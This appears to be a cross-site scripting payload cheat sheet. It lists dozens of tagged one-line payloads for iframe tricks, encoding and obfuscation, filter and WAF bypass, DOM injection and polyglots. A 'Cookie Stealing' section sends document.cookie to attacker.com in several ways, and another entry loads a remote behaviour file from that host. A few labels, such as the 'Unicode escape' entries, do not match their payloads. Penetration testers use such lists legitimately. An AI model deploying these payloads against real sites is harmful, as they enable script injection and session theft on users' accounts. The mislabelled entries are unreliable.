iframe with data URI and body onload
<iframe src='data:text/html,<body onload=alert(1)>></iframe>
bypass filter
advanced
event handlers
intermediate
iFrame Based
iframe with base64 encoded eval
<iframe src=javascript:eval(atob('YWxlcnQoMSk='))></iframe>
bypass filter
advanced
iFrame Based
iframe onload DOM manipulation (same domain)
<iframe src="//example.com" onload="this.contentWindow.document.body.innerHTML+='<img src=x onerror=alert(document.domain)>'"></iframe>
event handlers
advanced
dom
intermediate
iFrame Based
srcdoc trying to access parent (needs no sandbox or specific sandbox)
<iframe srcdoc='&lt;!DOCTYPE html&gt;&lt;script&gt;parent.alert(1)&lt;/script&gt;'></iframe>
advanced
iFrame Based
iframe onload to navigate to javascript URI
<iframe src="about:blank" onload="this.contentWindow.location='javascript:alert(1)'"></iframe>
event handlers
advanced
intermediate
Obfuscated/Encoded
String concatenation for window property access
<script>window['a'+'l'+'e'+'r'+'t'](1)</script>
advanced
bypass filter
Obfuscated/Encoded
Function constructor with string concatenation
<script>constructor.constructor('ale'+'rt(1)')()</script>
advanced
bypass filter
Obfuscated/Encoded
setTimeout with string concatenation in event handler
<img src=x onerror="setTimeout('ale'+'rt(1)',0)">
advanced
bypass filter
event handlers
Obfuscated/Encoded
Array constructor to get Function constructor in SVG
<svg onload="[].constructor.constructor('ale'+'rt(1)')()">
advanced
bypass filter
event handlers
Obfuscated/Encoded
String.fromCharCode decimal
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
advanced
bypass filter
Obfuscated/Encoded
Unicode escape sequence for alert(1)
<script>eval('\u0061\u006C\u0065\u0072\u0074(1)')</script>
advanced
bypass filter
Obfuscated/Encoded
unescape via variable
<script>var x = unescape; x('%61%6c%65%72%74%28%31%29');</script>
advanced
bypass filter
Obfuscated/Encoded
String concatenation for 'this' property access
<script>this['ale'+'rt'](1)</script>
advanced
bypass filter
Obfuscated/Encoded
IIFE with const variable (conceptual obfuscation)
<script>(() => { const evil = 'alert'; evil(1); })()</script>
advanced
Obfuscated/Encoded
Obfuscated top['alert'](1) - Number.toString(radix)
<script>top[8680439..toString(30)](1)</script>
advanced
bypass filter
Obfuscated/Encoded
Template literal with string concat property access
<img src=x onerror=window['ale'+'rt']`1`>
advanced
bypass filter
event handlers
Obfuscated/Encoded
RegExp constructor for Function constructor
<script>RegExp.prototype.constructor('alert(1)')()</script>
advanced
bypass filter
Obfuscated/Encoded
String concatenation for location assignment
<script>location='javascript:'+'alert(1)';</script>
advanced
bypass filter
Obfuscated/Encoded
HTML comment obfuscation
<!--<img src=--><img src=x onerror=alert(1)//-->
advanced
bypass filter
Obfuscated/Encoded
Attribute breaking out (less common)
<Script x=">">alert(1)</script>
advanced
bypass filter
Obfuscated/Encoded
JSFuck 'alert' (conceptual, requires full JSFuck library for complex functions)
<script>(''+(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]])(1)</script>
advanced
bypass filter
Obfuscated/Encoded
Base64 encoded script in data URI src
<script src="data:text/javascript;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
advanced
bypass filter
Obfuscated/Encoded
Missing equals for src, relies on loose parsing
<img src/onerror=alert(1)>
advanced
bypass filter
event handlers
Obfuscated/Encoded
JS comment and template literal used for obfuscation
<script>/*`*/confirm(1)//</script>
advanced
bypass filter
Obfuscated/Encoded
Padded decimal HTML entities
<a href="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert(1)">X</a>
advanced
bypass filter
Cookie Stealing (Demo)
Cookie stealing via SVG onload and fetch (DEMO ONLY)
<svg onload="fetch('//attacker.com/?c='+document.cookie)"></svg>
event handlers
advanced
intermediate
Cookie Stealing (Demo)
Cookie stealing via navigator.sendBeacon (DEMO ONLY)
<script>navigator.sendBeacon('//attacker.com/beacon', document.cookie)</script>
advanced
intermediate
Cookie Stealing (Demo)
Cookie stealing via auto-submitting form (DEMO ONLY)
<form action="//attacker.com/"><input type=hidden name=c value=""><input type=submit></form><script>document.forms[0].c.value=document.cookie;document.forms[0].submit();</script>
advanced
intermediate
Cookie Stealing (Demo)
Cookie stealing via window.open on click (DEMO ONLY)
<a href=# onclick="window.open('//attacker.com/?'+document.cookie)">Click to steal (DON'T)</a>
event handlers
intermediate
Cookie Stealing (Demo)
Cookie stealing via document.write in body onload (DEMO ONLY, may mess up page)
<body onload="let c=document.cookie; document.write('<img src=//attacker.com/?'+c+'>');">
event handlers
advanced
intermediate
Real-World Attacks
Conceptual: Input data rendered unfiltered by typeahead suggestions.
<!-- Example: Twitter typeahead.js vulnerability. Input: <img src=x onerror=alert(1)> -->
advanced
framework
Real-World Attacks
Conceptual: JSONP endpoint with AngularJS where callback name is injectable.
<!-- Example: AngularJS template injection in JSONP callback. callback=angular.callbacks._0;alert(1)// -->
advanced
framework
Real-World Attacks
Conceptual: Open redirect vulnerable parameter used with javascript: URI.
<!-- Example: eBay redirection XSS. Redirect URL: javascript:alert(document.domain) -->
advanced
Real-World Attacks
Conceptual: Markdown image syntax abused if parser doesn't sanitize javascript: URIs.
<!-- Example: Stored XSS via Markdown parser bypass. ![alt](javascript:alert(1)) -->
advanced
bypass filter
Real-World Attacks
Conceptual: HTC file used for persistent XSS in IE, if attacker can upload .htc
<div style="behavior:url('http://attacker.com/xss.htc')"></div>
advanced
Basic Alerts
Data URI with comma instead of base64
<a href="data:text/html;,<script>alert(1)</script>">Click</a>
advanced
bypass filter
intermediate
Event Handlers
onblur after onfocus clears value
<input type=text value=XSS onfocus=this.value='' onblur=alert(1)>
event handlers
intermediate
WAF Evasions
Unicode escape in data URI src
<sCriPt sRc="data:text/javascript,alert(1)"></sCriPt>
waf evasion
bypass filter
advanced
DOM-Based XSS
DOM creation of iframe with JS URI
var ifr=document.createElement('iframe');ifr.src='javascript:alert(1)';document.body.appendChild(ifr);
dom
advanced
intermediate
HTML Context (No Script Tag)
Script in foreignObject in SVG
<svg><foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script></body></foreignObject></svg>
advanced
Polyglot Payloads
Attribute breakout to iframe
"><iframe src=javascript:alert(1)>
polyglot
bypass filter
intermediate
Obfuscated/Encoded
Unicode escape for 'c' in script tags
<script>alert(1)</script>
waf evasion
bypass filter
advanced
Event Handlers
ondragstart event
<a draggable="true" ondragstart="alert(1)">Drag me</a>
event handlers
intermediate
Basic Alerts
Object tag onbeforeload (conceptual, requires specific content)
<object onbeforeload=alert(1)></object>
event handlers
advanced
WAF Evasions
Self property access with concatenation
<img src=x onerror="self['al'+'ert'](1)">
waf evasion
bypass filter
event handlers
advanced